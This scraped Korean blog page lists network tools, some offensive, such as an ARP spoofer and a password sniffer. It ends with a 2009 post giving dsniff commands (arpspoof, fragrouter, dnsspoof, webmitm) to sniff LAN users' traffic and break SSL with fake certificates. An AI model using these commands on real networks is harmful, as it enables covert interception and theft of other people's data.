  • SuperAgent
    This product from NetQoS analyzes application response times without the need to deploy client-side agents.
  • TCPKillNT
    TCPKillNT is a TCP connection "Reset" utility for Microsoft Windows NT platforms. It has the ability to send RST packets to already established TCP connections. Quite deadly on a LAN. It is very useful for IDS kind of products which need to terminate a TCP session.
  • ting
    ting is an OSI layer 4 connectivity assurance tool. It supports UDP multicast, unicast and TCP/IP. It makes use of the packet capture library to perform passive multicast monitoring.
  • TJesNetMonitor
    Borland C++ Builder wrapper for WinPcap. Comes with a sample application.
  • TraceDet
    TraceDet is a Traceroute Detector for Windows NT. Basically, it detects and logs if somebody trace routes to your host. The idea is that when somebody traces to your host, you receive IP packets with TTL value equal to 1. So, TraceDet looks out for such packets.
  • tracetcp
    tracetcp is a command line traceroute utility for WIN32 that uses TCP SYN packets rather than ICMP/UDP packets that the usual implementations use, thus bypassing gateways that block traditional traceroute packets.
  • TrafficStatistic
    MZL & Novatech TrafficStatistic shows the consumed traffic volume comfortably in system tray.
  • TrafficWatcher
    A tool to measure network traffic by service (FTP, mail, news, web, UDP etc)
  • TrafMeter
    TrafMeter is an utility for accounting and realtime monitoring of Internet traffic to and from a local network. It includes flexible filter engine, extensive logging facility and friendly user interface.
  • uIP
    uIP is an implementation of the TCP/IP protocol stack intended for small 8-bit and 16-bit microcontrollers. It provides the necessary protocols for Internet communication, with a very small code footprint and RAM requirements - the uIP code size is on the order of a few kilobytes and RAM usage is on the order of a few hundred bytes.
  • Unsniff Network Analyzer
    Unsniff features brand new visualization of packet data, advanced reassembly capabilities, full stream monitoring and several other enhancements over the current crop of network analyzers. What really sets Unsniff apart is its Scripting capabilities. Unsniff allows you to write your own network analysis scripts using the Ruby scripting language.You can also write powerful protocol handlers and other types of plugins using XML and/or C++. Unsniff is even available in Japanese.
  • Url Snooper
    Url Snooper is a a program written to help users locate the urls of audio and video files so that they can be recorded.
    VB.PCAP is an "Open Source and completely free" packet capture library for Visual Basic (tested on VB5 and VB6, not tested on VB.NET) based on Winpcap. The library exposes a set of APIs, that wrap aroud Winpcap using the _stdcall convention. The library is the foundstone for a network analyzer in VB.
  • Viper Chat
    ViperChat is a FREE LAN chat client compatible with Vypress Chat™ protocol version 1.93. It uses UDP communication over WinPcap.
  • Warp Pipe
    Warp Pipe is free software that runs on your PC or Mac and is available for Windows, Mac OSX, Linux, and BSD operating systems. While running on your PC or Mac, Warp Pipe allows you to play LAN-enabled Nintendo GameCube games over the Internet with other GameCube gamers.
  • Watt-32
    Watt-32 is a library for making networked TCP/IP programs in the language of C and C++ under DOS and Windows-NT.
  • WebSnurf
    Websnurf is a small application that follows a user web-surfing; that is to say, as you run WebSnurf on your PC, you can pursue web-surfing movements made on another PC. Obviously, you have to be connected over the same LAN.
  • Win32::NetPacket
    Win32::NetPacket is an Object-Oriented interface to the WinPcap packet.dll library.
  • Windows ARP Spoofer
    Windows ARP Spoofer (WinArpSpoof) is a program that can scan the computers including network devices and can spoof their ARP tables on local area network and can act as a router while pulling all packets on LAN.
  • Windows Toolbox
    The Windows Toolbox is a comprehensive collection of software and information for Windows - a toolbox of high quality applications and utilities for a wide array of functions, all freely re-distributable and under Free, Open Source, Freeware, Shareware or similar licences; documents on installing, configuring and maintaining Windows and various software applications, for stability, performance, usability and security.
  • Windump
    WinDump is the Windows version of the famous tcpdump Unix tool. It's developed and maintained by the WinPcap team.
  • Winfingerprint
    Winfingerprint is a Win32 Host/Network Enumeration Scanner. Winfingerprint is capable of performing SMB, TCP, UDP, ICMP, RPC, and SNMP scans.
  • WinPcapArp
    WinPcapArp is ARP client library that works on Windows OS(NT and 2000). The main purpose of this library is to get a MAC address of the target ethernet NIC with the IP address.
  • WinPcapDhcpCD
    WinPcapDhcpCD is a DHCP client demon library that works on Windows OS (NT and 2000). The purpose of this library is to get more than one IP addresses in your application program.
  • WinSniff
    WinSniff is an application for capturing packets on the network. It displays all the packets that are transmitted on the local network and gives detailed information about each header in the packet.
  • WinWhif
    WinWhif allows any PC running Windows (95, 98, NT or 2000) to record the DICOM traffic between two machines on the same network.  It can be useful in diagnosing DICOM communications problems.
  • Wireshark/Ethereal
    Wireshark (formerly known as Ethereal) is the world's most popular network analyzer. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, viewing summary and detail information for each packet. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.
  • wpa_supplicant
    wpa_supplicant is a WPA Supplicant for Linux, BSD and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver.
  • YATT
    YATT is a project to replace the current proliferation of trace tools ( tcpTrace, proxyTrace, pcapTrace ), with a single extensible tracing tool. YATT features a new GUI built with WTL, complete with a Hex View mode, and currently ships with 2 Trace providers, one based on WinPCAP and one based on the W2K Raw sockets support.
  • York
    York logs ip/fqdn addresses if all traffic. It can save sniffed http and ftp files. Also you can sniff for HTTP, FTP, POP3, SMTP, SMB, VNC and AIM password/hash. Further you can see the web browsing from other users, so your browser will show the same pages as the selected user. A screensaver is included, it shows the pictures which are sniffed in a slide show manner.

출처 : http://blog.naver.com/java2core

Trackback 8 Comment 0
2009.06.03 15:14

dsniff 이용한 패킷 스니핑 (Packet Sniff)

동일 네트웍 상에 있는 컴퓨터 들은, gateway 의 mac주소를 arp spoofing 하는 방법으로 밖으로 나가는 패킷들을 sniffing 할 수 있다.

dsniff 란 툴을 이용하면 이것들을 쉽게 할 수 있다.

콘솔을 3개 띄워서 각각의 명령어를 친다.

1. gateway 의 주소를 속인다
$ sudo arpspoof -i wlan0 -t

2. 들어오는 패킷을 외부로 라우팅 해준다. (이렇게 해야 실제 컴퓨터를 사용하는 사람은 기존과 똑같이 인터넷을 이용할 수 있다.)
$ sudo fragrouter -i wlan0 -B1

3. 원하는 packet 을 캡춰한다.
$ sudo tcpdump tcp dst port 80 -i wlan0 -s1500 -w-

만약 SSL 을 사용한다면 이런식으로 패킷을 본다고 해도 암호화 되었으므로 내용을 볼 수는 없다. 이때는 MITM 이라는 공격 방법을 통해 가능하다.

원리는 중간에서 가짜 인증서를 클라이언트에게 주고 패킷을 실서버랑 중계해 내용을 sniffing 하는 방법으로, 사용자가 인증서를 제대로 확인하고 접속 할때만 가능하다.

사용자가 위와 같은 경고창을 사용자가 무시한면 sniffing 이 가능하다. (그림: IE6 인증서 경고창)

1, 2 번작업 동일.

3. dns 를 속인다. (host 파일에 속일 주소를 적는다.) 이렇게 하면 내가 실제 서버가 아닌 내가 지정한 서버로 접속을 하도록 만들 수 있다.
$ cat host *.sample.com
$ sudo dnsspoof -f host

4. 이제 들어오는 패킷을 실제 웹서버로 중계한다.
$ sudo webmitm -dd

중계하는 과정에 가짜 인증서로 암호화된 패킷을 디코딩 해 모두 볼 수 있게 된다. 실제 웹서버에게는 정상적인 인증서로 내용을 암호화해서 보내게 된다.


Trackback 1 Comment 0